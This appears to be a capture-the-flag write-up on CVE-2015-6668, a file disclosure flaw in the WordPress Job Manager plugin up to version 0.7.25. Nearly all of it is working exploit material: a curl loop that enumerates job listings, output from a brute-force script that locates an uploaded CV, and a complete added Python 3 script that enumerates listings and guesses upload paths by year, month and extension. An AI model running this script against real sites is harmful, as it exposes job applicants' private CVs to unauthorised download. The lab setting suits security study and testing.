WordPress Job Manager Plugin File Disclosure

foothold, wordpress, web

Overview #

The Job Manager plugin for WordPress, up to and including version 0.7.25, stores applicants' uploaded CVs under the web-accessible wp-content/uploads/<year>/<month>/ directory, keeping the original file name and applying no access control to the directory. An unauthenticated attacker who knows or guesses an applicant's file name only has to brute-force the upload year, month and extension to download the CV directly.

CVE-2015-6668

Environment Setup #

Steps #

First enumerate the job listings: each apply page at index.php/jobs/apply/<id>/ carries the job title in its entry-title element, and the loop prints the id next to that title.

```bash
for i in $(seq 1 25); do
  echo -n "$i: "
  curl -s http://tenten/index.php/jobs/apply/$i/ | grep 'entry-title' | cut -d'>' -f2 | cut -d'<' -f1
done
```

Then run the disclosure script against the site with the file name (without extension) of an uploaded CV; it tries the year, month and extension combinations under wp-content/uploads/ and reports the first one that exists:

```
➜  exploit python2 brute.py

CVE-2015-6668
Title: CV filename disclosure on Job-Manager WP Plugin
Blog: https://vagmour.eu
Plugin URL: http://www.wp-jobmanager.com
Versions: <=0.7.25

Enter a vulnerable website: http://tenten
Enter a file name: HackerAccessGranted
[+] URL of CV found! http://tenten/wp-content/uploads/2017/04/HackerAccessGranted.jpg
➜  exploit
```
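Both steps carried into a single Python 3 script, as an added example that is not the page's brute.py and not the vagmour script. It uses only the standard library; the target URL, the CV file name and the year range are caller-supplied assumptions, and the extension list is a guess, since the plugin's accepted upload types are not stated on this page (the page's own hit was a .jpg).

```python
#!/usr/bin/env python3
"""Added example for CVE-2015-6668 (Job Manager <= 0.7.25): enumerate job
titles from the apply pages, then guess the public upload path of a CV.
Target, file name and year range are assumptions passed in by the caller."""
import re
import sys
from itertools import product
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen

# Extensions worth trying. The plugin's real accept list is not on the page,
# so this is an assumption; the page's own finding was a .jpg.
EXTENSIONS = ("pdf", "doc", "docx", "odt", "rtf", "txt", "jpg", "jpeg", "png")

# Text of the first element whose class list contains entry-title,
# the same thing the grep/cut pipeline in the one-liner extracts.
TITLE_RE = re.compile(r'class="[^"]*\bentry-title\b[^"]*"[^>]*>([^<]*)<', re.I)


def entry_title(html):
    """Return the entry-title text of a page, or None if it has none."""
    m = TITLE_RE.search(html)
    return m.group(1).strip() if m else None


def fetch(url, method="GET", timeout=5):
    """Return (status, body); HTTP errors become their status code,
    connection failures become status 0."""
    req = Request(url, method=method, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except HTTPError as e:
        return e.code, ""
    except URLError:
        return 0, ""


def enumerate_jobs(base, ids, get=fetch):
    """Step 1: map job id -> title for /index.php/jobs/apply/<id>/."""
    jobs = {}
    for i in ids:
        status, body = get(f"{base.rstrip('/')}/index.php/jobs/apply/{i}/")
        title = entry_title(body) if status == 200 else None
        if title:
            jobs[i] = title
    return jobs


def candidate_urls(base, filename, years, months=range(1, 13), exts=EXTENSIONS):
    """Every wp-content/uploads/<year>/<month>/<filename>.<ext> the plugin
    could have written the CV to; WordPress zero-pads the month."""
    base = base.rstrip("/")
    for year, month, ext in product(years, months, exts):
        yield f"{base}/wp-content/uploads/{year}/{month:02d}/{filename}.{ext}"


def find_cv(base, filename, years, get=fetch):
    """Step 2: return the first candidate URL that answers 200, else None.
    HEAD is cheaper than GET; fall back to GET if the server refuses HEAD."""
    for url in candidate_urls(base, filename, years):
        status, _ = get(url, method="HEAD")
        if status == 405:
            status, _ = get(url)
        if status == 200:
            return url
    return None


if __name__ == "__main__":
    if len(sys.argv) != 3:
        sys.exit(f"usage: {sys.argv[0]} http://target CV-file-name-without-extension")
    target, name = sys.argv[1], sys.argv[2]
    for jid, title in enumerate_jobs(target, range(1, 26)).items():
        print(f"{jid}: {title}")
    hit = find_cv(target, name, range(2015, 2019))  # year range is an assumption
    print(f"[+] URL of CV found! {hit}" if hit else "[-] no CV found")
```

The guessable part of the path is only year, month and extension, so a sweep over a few years costs a few hundred HEAD requests; the file name itself has to come from elsewhere, which is why the listings are enumerated first. The `get` parameter exists so the URL logic can be exercised against a fake fetcher without touching a live target.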

References #